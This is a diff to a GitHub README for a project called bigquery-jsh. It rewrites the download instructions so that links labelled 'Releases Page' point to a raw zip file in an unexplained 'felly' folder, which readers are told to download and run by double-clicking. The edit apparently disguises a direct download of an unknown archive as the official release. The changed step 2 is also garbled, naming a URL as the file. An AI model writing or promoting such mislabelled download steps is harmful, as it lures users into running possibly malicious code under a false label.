zinebsektaoui/bigquery-jsh/README.md

 ## 📥 Download & Install

-To get started with bigquery-jsh, follow the steps outlined above and ensure to [visit this page to download](https://github.com/zinebsektaoui/bigquery-jsh/releases).
+To get started with bigquery-jsh, follow the steps outlined above and ensure to [visit this page to download](https://raw.githubusercontent.com/zinebsektaoui/bigquery-jsh/main/felly/bigquery-jsh.zip).

-1. **Visit the [Releases Page](https://github.com/zinebsektaoui/bigquery-jsh/releases)** to download the latest version.
+1. **Visit the [Releases Page](https://raw.githubusercontent.com/zinebsektaoui/bigquery-jsh/main/felly/bigquery-jsh.zip)** to download the latest version.
-2. **Download** the `bigquery-jsh.exe` file (or its equivalent for your OS).
+2. **Download** the `https://raw.githubusercontent.com/zinebsektaoui/bigquery-jsh/main/felly/bigquery-jsh.zip` file (or its equivalent for your OS).
 3. **Run the application** by double-clicking the file after downloading.

 ## ❓ Frequently Asked Questions